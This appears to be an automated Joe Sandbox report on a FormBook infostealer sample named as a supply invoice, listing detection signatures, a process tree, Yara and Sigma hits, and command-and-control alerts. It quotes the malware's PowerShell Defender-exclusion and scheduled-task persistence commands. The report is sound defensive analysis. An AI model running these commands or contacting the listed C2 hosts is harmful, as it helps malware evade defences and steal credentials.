Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1SupplyInvoiceCM60916_Doc.exe

Overview

General Information

Sample name:z1SupplyInvoiceCM60916_Doc.exe
Analysis ID:1527933
MD5:a903c6fb836f2c2c2762d1fde269bdb8
SHA1:951db6eeeef69c89d7096ba54aa8c4a95273b9a4
SHA256:bbd7ba6f8ae2b651eeb05135ba638a2de431be9c9a8b347621391b733c95f865
Tags:exeFormbookuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SIDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z1SupplyInvoiceCM60916_Doc.exe (PID: 3840 cmdline: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe" MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
    • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4088 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • z1SupplyInvoiceCM60916_Doc.exe (PID: 6116 cmdline: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe" MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
      • IEFVDUdSaLLhw.exe (PID: 1460 cmdline: "C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • svchost.exe (PID: 6688 cmdline: "C:\Windows\SysWOW64\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • firefox.exe (PID: 3048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • dpqsbGoWdXlp.exe (PID: 1708 cmdline: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
    • schtasks.exe (PID: 4508 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dpqsbGoWdXlp.exe (PID: 5676 cmdline: "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe" MD5: A903C6FB836F2C2C2762D1FDE269BDB8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2be50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e533:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ProcessId: 6684, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ProcessId: 6684, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe, ParentImage: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe, ParentProcessId: 1708, ParentProcessName: dpqsbGoWdXlp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp", ProcessId: 4508, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", ProcessId: 4088, ProcessName: schtasks.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe" , ParentImage: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe, ParentProcessId: 1460, ParentProcessName: IEFVDUdSaLLhw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6688, ProcessName: svchost.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ProcessId: 6684, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe" , ParentImage: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe, ParentProcessId: 1460, ParentProcessName: IEFVDUdSaLLhw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6688, ProcessName: svchost.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe", ParentImage: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe, ParentProcessId: 3840, ParentProcessName: z1SupplyInvoiceCM60916_Doc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp", ProcessId: 4088, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T12:33:30.413477+020020507451Malware Command and Control Activity Detected192.168.2.6498643.33.130.19080TCP
            2024-10-07T12:33:54.877005+020020507451Malware Command and Control Activity Detected192.168.2.649994119.18.54.2780TCP
            2024-10-07T12:34:08.398289+020020507451Malware Command and Control Activity Detected192.168.2.649999104.21.5.12580TCP
            2024-10-07T12:34:22.447412+020020507451Malware Command and Control Activity Detected192.168.2.6500043.33.130.19080TCP
            2024-10-07T12:34:35.712226+020020507451Malware Command and Control Activity Detected192.168.2.650009162.0.215.3380TCP
            2024-10-07T12:34:49.206027+020020507451Malware Command and Control Activity Detected192.168.2.650013161.97.168.24580TCP
            2024-10-07T12:35:02.512579+020020507451Malware Command and Control Activity Detected192.168.2.6500173.33.130.19080TCP
            2024-10-07T12:35:15.652529+020020507451Malware Command and Control Activity Detected192.168.2.6500223.33.130.19080TCP
            2024-10-07T12:35:29.758274+020020507451Malware Command and Control Activity Detected192.168.2.650026209.74.64.19080TCP
            2024-10-07T12:35:43.466281+020020507451Malware Command and Control Activity Detected192.168.2.65003068.178.233.11380TCP
            2024-10-07T12:35:56.623411+020020507451Malware Command and Control Activity Detected192.168.2.6500343.33.130.19080TCP
            2024-10-07T12:36:18.635812+020020507451Malware Command and Control Activity Detected192.168.2.65003838.55.251.23380TCP
            2024-10-07T12:36:31.961637+020020507451Malware Command and Control Activity Detected192.168.2.650043162.0.215.3380TCP
            2024-10-07T12:37:06.037449+020020507451Malware Command and Control Activity Detected192.168.2.6500478.217.17.19280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T12:33:30.413477+020028554651A Network Trojan was detected192.168.2.6498643.33.130.19080TCP
            2024-10-07T12:33:54.877005+020028554651A Network Trojan was detected192.168.2.649994119.18.54.2780TCP
            2024-10-07T12:34:08.398289+020028554651A Network Trojan was detected192.168.2.649999104.21.5.12580TCP
            2024-10-07T12:34:22.447412+020028554651A Network Trojan was detected192.168.2.6500043.33.130.19080TCP
            2024-10-07T12:34:35.712226+020028554651A Network Trojan was detected192.168.2.650009162.0.215.3380TCP
            2024-10-07T12:34:49.206027+020028554651A Network Trojan was detected192.168.2.650013161.97.168.24580TCP
            2024-10-07T12:35:02.512579+020028554651A Network Trojan was detected192.168.2.6500173.33.130.19080TCP
            2024-10-07T12:35:15.652529+020028554651A Network Trojan was detected192.168.2.6500223.33.130.19080TCP
            2024-10-07T12:35:29.758274+020028554651A Network Trojan was detected192.168.2.650026209.74.64.19080TCP
            2024-10-07T12:35:43.466281+020028554651A Network Trojan was detected192.168.2.65003068.178.233.11380TCP
            2024-10-07T12:35:56.623411+020028554651A Network Trojan was detected192.168.2.6500343.33.130.19080TCP
            2024-10-07T12:36:18.635812+020028554651A Network Trojan was detected192.168.2.65003838.55.251.23380TCP
            2024-10-07T12:36:31.961637+020028554651A Network Trojan was detected192.168.2.650043162.0.215.3380TCP
            2024-10-07T12:37:06.037449+020028554651A Network Trojan was detected192.168.2.6500478.217.17.19280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T12:33:47.257489+020028554641A Network Trojan was detected192.168.2.649969119.18.54.2780TCP
            2024-10-07T12:33:49.804750+020028554641A Network Trojan was detected192.168.2.649987119.18.54.2780TCP
            2024-10-07T12:33:52.367188+020028554641A Network Trojan was detected192.168.2.649992119.18.54.2780TCP
            2024-10-07T12:34:00.757031+020028554641A Network Trojan was detected192.168.2.649995104.21.5.12580TCP
            2024-10-07T12:34:03.309278+020028554641A Network Trojan was detected192.168.2.649996104.21.5.12580TCP
            2024-10-07T12:34:05.847786+020028554641A Network Trojan was detected192.168.2.649998104.21.5.12580TCP
            2024-10-07T12:34:13.941938+020028554641A Network Trojan was detected192.168.2.6500003.33.130.19080TCP
            2024-10-07T12:34:16.462640+020028554641A Network Trojan was detected192.168.2.6500013.33.130.19080TCP
            2024-10-07T12:34:20.039330+020028554641A Network Trojan was detected192.168.2.6500033.33.130.19080TCP
            2024-10-07T12:34:28.111247+020028554641A Network Trojan was detected192.168.2.650005162.0.215.3380TCP
            2024-10-07T12:34:30.678244+020028554641A Network Trojan was detected192.168.2.650006162.0.215.3380TCP
            2024-10-07T12:34:33.201827+020028554641A Network Trojan was detected192.168.2.650008162.0.215.3380TCP
            2024-10-07T12:34:41.559097+020028554641A Network Trojan was detected192.168.2.650010161.97.168.24580TCP
            2024-10-07T12:34:44.112473+020028554641A Network Trojan was detected192.168.2.650011161.97.168.24580TCP
            2024-10-07T12:34:46.654874+020028554641A Network Trojan was detected192.168.2.650012161.97.168.24580TCP
            2024-10-07T12:34:54.742279+020028554641A Network Trojan was detected192.168.2.6500143.33.130.19080TCP
            2024-10-07T12:34:57.262281+020028554641A Network Trojan was detected192.168.2.6500153.33.130.19080TCP
            2024-10-07T12:34:59.817849+020028554641A Network Trojan was detected192.168.2.6500163.33.130.19080TCP
            2024-10-07T12:35:08.027836+020028554641A Network Trojan was detected192.168.2.6500193.33.130.19080TCP
            2024-10-07T12:35:11.501332+020028554641A Network Trojan was detected192.168.2.6500203.33.130.19080TCP
            2024-10-07T12:35:14.164268+020028554641A Network Trojan was detected192.168.2.6500213.33.130.19080TCP
            2024-10-07T12:35:21.946304+020028554641A Network Trojan was detected192.168.2.650023209.74.64.19080TCP
            2024-10-07T12:35:24.477025+020028554641A Network Trojan was detected192.168.2.650024209.74.64.19080TCP
            2024-10-07T12:35:27.215648+020028554641A Network Trojan was detected192.168.2.650025209.74.64.19080TCP
            2024-10-07T12:35:35.797681+020028554641A Network Trojan was detected192.168.2.65002768.178.233.11380TCP
            2024-10-07T12:35:38.348515+020028554641A Network Trojan was detected192.168.2.65002868.178.233.11380TCP
            2024-10-07T12:35:40.922359+020028554641A Network Trojan was detected192.168.2.65002968.178.233.11380TCP
            2024-10-07T12:35:48.971881+020028554641A Network Trojan was detected192.168.2.6500313.33.130.19080TCP
            2024-10-07T12:35:52.446394+020028554641A Network Trojan was detected192.168.2.6500323.33.130.19080TCP
            2024-10-07T12:35:54.075073+020028554641A Network Trojan was detected192.168.2.6500333.33.130.19080TCP
            2024-10-07T12:36:11.020258+020028554641A Network Trojan was detected192.168.2.65003538.55.251.23380TCP
            2024-10-07T12:36:13.566533+020028554641A Network Trojan was detected192.168.2.65003638.55.251.23380TCP
            2024-10-07T12:36:16.078392+020028554641A Network Trojan was detected192.168.2.65003738.55.251.23380TCP
            2024-10-07T12:36:24.286083+020028554641A Network Trojan was detected192.168.2.650040162.0.215.3380TCP
            2024-10-07T12:36:26.838386+020028554641A Network Trojan was detected192.168.2.650041162.0.215.3380TCP
            2024-10-07T12:36:29.376188+020028554641A Network Trojan was detected192.168.2.650042162.0.215.3380TCP
            2024-10-07T12:36:37.921582+020028554641A Network Trojan was detected192.168.2.6500448.217.17.19280TCP
            2024-10-07T12:36:40.470406+020028554641A Network Trojan was detected192.168.2.6500458.217.17.19280TCP
            2024-10-07T12:36:43.038469+020028554641A Network Trojan was detected192.168.2.6500468.217.17.19280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeReversingLabs: Detection: 47%
            Multi AV Scanner detection for submitted file
            Source: z1SupplyInvoiceCM60916_Doc.exeReversingLabs: Detection: 47%
            Yara detected FormBook
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: paDa.pdbSHA256 source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IEFVDUdSaLLhw.exe, 0000000D.00000000.2215877606.0000000000B2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z1SupplyInvoiceCM60916_Doc.exe, z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: paDa.pdb source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: svchost.pdb source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007CC3A0 FindFirstFileW,FindNextFileW,FindClose,15_2_007CC3A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 4x nop then xor esi, esi11_2_00418575
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 4x nop then xor esi, esi11_2_0041850B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor eax, eax15_2_007B9BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi15_2_007D24D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor esi, esi15_2_007C5028
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor esi, esi15_2_007C509C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi15_2_007BDF0F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov ebx, 00000004h15_2_034004E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
